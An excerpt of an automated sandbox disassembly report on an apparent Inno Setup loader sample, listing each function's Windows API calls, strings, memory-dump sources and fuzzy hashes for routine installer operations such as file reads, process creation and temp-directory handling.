                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale
                                                                                      • String ID:
                                                                                      • API String ID: 2299586839-0
                                                                                      • Opcode ID: 8ef9b48ed96d6a8df8db933101511442404bdd0abec70889978d036278c5d13e
                                                                                      • Instruction ID: b78bf48cff894a3999656c5243e329942f020ab22272e2e872fdbeeaebf0035e
                                                                                      • Opcode Fuzzy Hash: 8ef9b48ed96d6a8df8db933101511442404bdd0abec70889978d036278c5d13e
                                                                                      • Instruction Fuzzy Hash: EDE09271B0021426D711A9699C86AEB735DDB58310F0006BFB904EB3C6EDB49E8046ED
                                                                                      Function 00408FC8 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00409061,?,?,?,?,00000000,?,00409B53), ref: 00408FE8
                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408FEE
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00409061,?,?,?,?,00000000,?,00409B53), ref: 00409002
                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00409008
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                      • API String ID: 1646373207-2130885113
                                                                                      • Opcode ID: 17e7db4c528402608d9f53e260f8b79ce616995abb8d95c1af2dd02ed3ed6c5c
                                                                                      • Instruction ID: 9fcc65c531327f2d7efb14c601a25e4e420c6304718e48176e9e04a6a3b299d5
                                                                                      • Opcode Fuzzy Hash: 17e7db4c528402608d9f53e260f8b79ce616995abb8d95c1af2dd02ed3ed6c5c
                                                                                      • Instruction Fuzzy Hash: 6701DF70208300AEEB10AB76DC47B563AA8E782714F60843BF504B22C3CA7C5C44CA2E
                                                                                      Function 00409FB4 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A010
                                                                                      • SetWindowLongA.USER32(00010474,000000FC,004097FC), ref: 0040A027
                                                                                        • Part of subcall function 00406ADC: GetCommandLineA.KERNEL32(00000000,00406B20,?,?,?,?,00000000,?,0040A098,?), ref: 00406AF4
                                                                                        • Part of subcall function 00409888: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974,00000000,0040995B), ref: 004098F8
                                                                                        • Part of subcall function 00409888: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974,00000000), ref: 0040990C
                                                                                        • Part of subcall function 00409888: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
                                                                                        • Part of subcall function 00409888: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
                                                                                        • Part of subcall function 00409888: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974), ref: 00409940
                                                                                      • RemoveDirectoryA.KERNEL32(00000000,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A113
                                                                                      • 73A15CF0.USER32(00010474,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A127
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                      • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                      • API String ID: 978128352-3001827809
                                                                                      • Opcode ID: f35d8c1ce23740e5e47570a4a7ea1aa6b0c7a4e1336b706dbfad7c34b6de0a74
                                                                                      • Instruction ID: 994b03bd5abc72cbe06dd2c14f0861f5fc0fad0f3ad24bd21fe84be6bde737e4
                                                                                      • Opcode Fuzzy Hash: f35d8c1ce23740e5e47570a4a7ea1aa6b0c7a4e1336b706dbfad7c34b6de0a74
                                                                                      • Instruction Fuzzy Hash: 57411A70A00205DFD715EBA9EE86B9A7BA5EB84304F10427BF510B73E2DB789801DB5D
                                                                                      Function 00409FD8 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 102COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00409460: GetLastError.KERNEL32(00000000,00409503,?,0040B240,?,02081638), ref: 00409484
                                                                                      • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A010
                                                                                      • SetWindowLongA.USER32(00010474,000000FC,004097FC), ref: 0040A027
                                                                                        • Part of subcall function 00406ADC: GetCommandLineA.KERNEL32(00000000,00406B20,?,?,?,?,00000000,?,0040A098,?), ref: 00406AF4
                                                                                        • Part of subcall function 00409888: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974,00000000,0040995B), ref: 004098F8
                                                                                        • Part of subcall function 00409888: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974,00000000), ref: 0040990C
                                                                                        • Part of subcall function 00409888: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
                                                                                        • Part of subcall function 00409888: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
                                                                                        • Part of subcall function 00409888: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974), ref: 00409940
                                                                                      • RemoveDirectoryA.KERNEL32(00000000,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A113
                                                                                      • 73A15CF0.USER32(00010474,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A127
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryErrorExitLastLineLongMultipleObjectsRemoveWait
                                                                                      • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                      • API String ID: 240127915-3001827809
                                                                                      • Opcode ID: 41e9b17cc1901837085009e7774581f9f675215498936b1d5fec870b95540319
                                                                                      • Instruction ID: cbbd3698a6e5ddb8e812fa6c760aedb007618753dcf5685e5a94b93d1743052f
                                                                                      • Opcode Fuzzy Hash: 41e9b17cc1901837085009e7774581f9f675215498936b1d5fec870b95540319
                                                                                      • Instruction Fuzzy Hash: 04412B70A00205DBC715EBA9EE86B9E3BA5EB84304F10427BF510B73E2DB789801DB5D
                                                                                      Function 00409888 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974,00000000,0040995B), ref: 004098F8
                                                                                      • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974,00000000), ref: 0040990C
                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
                                                                                      • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
                                                                                      • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974), ref: 00409940
                                                                                        • Part of subcall function 00409460: GetLastError.KERNEL32(00000000,00409503,?,0040B240,?,02081638), ref: 00409484
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                      • String ID: D
                                                                                      • API String ID: 3356880605-2746444292
                                                                                      • Opcode ID: 3e364823df46f41b243604843b678d585e88c5cad38ef85377b023b87dae9783
                                                                                      • Instruction ID: 0c6d97fba1df7b16fba7b9ed0c132cba9133a3324ac8f072eb64155fee6ae1b7
                                                                                      • Opcode Fuzzy Hash: 3e364823df46f41b243604843b678d585e88c5cad38ef85377b023b87dae9783
                                                                                      • Instruction Fuzzy Hash: AC1130B16142086EDB10FBE68C52F9EBBACEF49718F50013EB614F62C7DA785D048669
                                                                                      Function 00409D26 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117windowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409D8A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message
                                                                                      • String ID: $u@$.tmp
                                                                                      • API String ID: 2030045667-236237750
                                                                                      • Opcode ID: 76a7687ccf1c1f3f155fed8792e4b2e0c469f7c74cc7371f2538726c547644a2
                                                                                      • Instruction ID: fbeaf51a7290a35b1d20cf1acd7fffd14229a7cea4ec7fe779b7d8bf1d8f9ef0
                                                                                      • Opcode Fuzzy Hash: 76a7687ccf1c1f3f155fed8792e4b2e0c469f7c74cc7371f2538726c547644a2
                                                                                      • Instruction Fuzzy Hash: 7041A170604201DFD311EF19DE92A5A7BA6FB49304B11453AF801B73E2CB79AC01DAAD
                                                                                      Function 00409D41 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113windowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409D8A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message
                                                                                      • String ID: $u@$.tmp
                                                                                      • API String ID: 2030045667-236237750
                                                                                      • Opcode ID: 4be92c8e37dddd0a3a50cfadddd3e7ce3c10b6794e32ae209eae1f209508f25f
                                                                                      • Instruction ID: 7aabf0afbc79ebbbc3d3aa4d6af75c8ddef5afe13af9357e4f9bebdf666c2db7
                                                                                      • Opcode Fuzzy Hash: 4be92c8e37dddd0a3a50cfadddd3e7ce3c10b6794e32ae209eae1f209508f25f
                                                                                      • Instruction Fuzzy Hash: 66418070600201DFC711EF69DE92A5A7BB6FB49304B11457AF801B73E2CB79AC01DAAD
                                                                                      Function 00409254 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00409343,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040929A
                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,00000000,00409343,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004092A3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID: .tmp
                                                                                      • API String ID: 1375471231-2986845003
                                                                                      • Opcode ID: 7647810fba1c1a7df54c129ecd6d2966c744d5805a6f131b99297333171aebfe
                                                                                      • Instruction ID: 381de743b5e558d6c5ac88c9815bc56a2e764fefa580558ac3af8d983805238d
                                                                                      • Opcode Fuzzy Hash: 7647810fba1c1a7df54c129ecd6d2966c744d5805a6f131b99297333171aebfe
                                                                                      • Instruction Fuzzy Hash: 3C214975A002089BDB01EFE1C9429DEB7B9EB48304F10457BE901B73C2DA7CAF058AA5
                                                                                      Function 00406F00 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 311 406f00-406f53 SetErrorMode call 403414 LoadLibraryA
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00008000), ref: 00406F0A
                                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,00406F54,?,00000000,00406F72,?,00008000), ref: 00406F39
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLibraryLoadMode
                                                                                      • String ID:
                                                                                      • API String ID: 2987862817-0
                                                                                      • Opcode ID: 280b78466cfb49ac5d1a4d8de4e82968344a77d2278ba686a31885ea79f0a63b
                                                                                      • Instruction ID: 61c75ae37e4b7eabf140846b9e9d3e90831ba1beb5fed57b889ca027c52d2016
                                                                                      • Opcode Fuzzy Hash: 280b78466cfb49ac5d1a4d8de4e82968344a77d2278ba686a31885ea79f0a63b
                                                                                      • Instruction Fuzzy Hash: 49F08270614704BEDB029FB69C6282BBBFCE749B0475348B6F904A26D2E53C5D208568
                                                                                      Function 004075CC Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 321 4075cc-4075f1 SetFilePointer 322 407603-407608 321->322 323 4075f3-4075fa GetLastError 321->323 323->322 324 4075fc-4075fe call 4073ec 323->324 324->322
                                                                                      APIs
                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 004075EB
                                                                                      • GetLastError.KERNEL32(?,?,?,00000000), ref: 004075F3
                                                                                        • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020803AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 1156039329-0
                                                                                      • Opcode ID: 4b4e93de333a3cce642c2996d73c93b1535ff8d1f0695df8178d397978e57373
                                                                                      • Instruction ID: cda5b13584bb414d1d7c0d7cef5a43535e1b929ad68122291bf656bee98e9d77
                                                                                      • Opcode Fuzzy Hash: 4b4e93de333a3cce642c2996d73c93b1535ff8d1f0695df8178d397978e57373
                                                                                      • Instruction Fuzzy Hash: A0E092766081016FD601D55EC881B9B33DCDFC5365F00453ABA54EB2D1D675AC0087B6
                                                                                      Function 0040758C Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 315 40758c-4075aa ReadFile 316 4075c3-4075ca 315->316 317 4075ac-4075b0 315->317 318 4075b2-4075ba GetLastError 317->318 319 4075bc-4075be call 4073ec 317->319 318->316 318->319 319->316
                                                                                      APIs
                                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 004075A3
                                                                                      • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 004075B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastRead
                                                                                      • String ID:
                                                                                      • API String ID: 1948546556-0
                                                                                      • Opcode ID: 60e63bc2ff5526e1bd28c8a7098a19329bed0093cf160d1b5924f83231400461
                                                                                      • Instruction ID: 6d0e635579d8ef6deec62af0acb898b5effba2491802df9b0589d4017bc118ea
                                                                                      • Opcode Fuzzy Hash: 60e63bc2ff5526e1bd28c8a7098a19329bed0093cf160d1b5924f83231400461
                                                                                      • Instruction Fuzzy Hash: 4FE012B1A181147AEB24965A9CC5FAB6BDCCBC5314F14847BF904DB282D678DC04877B
                                                                                      Function 00407524 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 326 407524-407545 SetFilePointer 327 407557-407559 326->327 328 407547-40754e GetLastError 326->328 328->327 329 407550-407552 call 4073ec 328->329 329->327
                                                                                      APIs
                                                                                      • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 0040753B
                                                                                      • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 00407547
                                                                                        • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020803AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 1156039329-0
                                                                                      • Opcode ID: 0dd762855ce75d8d861d21fe55c1929f9bb0fd02210f0b496c114b023f039fab
                                                                                      • Instruction ID: cd7afd6369a15af5fc7b0f7528e30ca6696358c0ea2e6c45e94f6e0b4d50a73a
                                                                                      • Opcode Fuzzy Hash: 0dd762855ce75d8d861d21fe55c1929f9bb0fd02210f0b496c114b023f039fab
                                                                                      • Instruction Fuzzy Hash: 0EE04FB1600210AFEB10EEB98C81B9672DC9F48364F048576EA14DF2C6D274DC00C766
                                                                                      Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 331 401430-40143d 332 401446-40144c 331->332 333 40143f-401444 331->333 334 401452-40146a VirtualAlloc 332->334 333->334 335 40146c-40147a call 4012e4 334->335 336 40148f-401492 334->336 335->336 339 40147c-40148d VirtualFree 335->339 339->336
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$AllocFree
                                                                                      • String ID:
                                                                                      • API String ID: 2087232378-0
                                                                                      • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                      • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                      • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                      • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                      Function 004051D0 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,00405306), ref: 004051EF
                                                                                        • Part of subcall function 00404C2C: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404C49
                                                                                        • Part of subcall function 0040515C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                      • String ID:
                                                                                      • API String ID: 1658689577-0
                                                                                      • Opcode ID: 9ea3c66d670cb0c44a2644de082ff92dfdb36693542507e19320d23b5394a13d
                                                                                      • Instruction ID: c760dbbb10683706500036a577470844d35ac6ab0c013c9c95042e4326961867
                                                                                      • Opcode Fuzzy Hash: 9ea3c66d670cb0c44a2644de082ff92dfdb36693542507e19320d23b5394a13d
                                                                                      • Instruction Fuzzy Hash: 3B313D75E00119ABCB00EF95C8C19EEB779FF84304F158977E815BB285E739AE058B98
                                                                                      Function 004074D6 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407518
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: ce86d0b46b6749cbb1c8065cdd94f6338fa023cacd1506a2c152e65e14b54ccf
                                                                                      • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                      • Opcode Fuzzy Hash: ce86d0b46b6749cbb1c8065cdd94f6338fa023cacd1506a2c152e65e14b54ccf
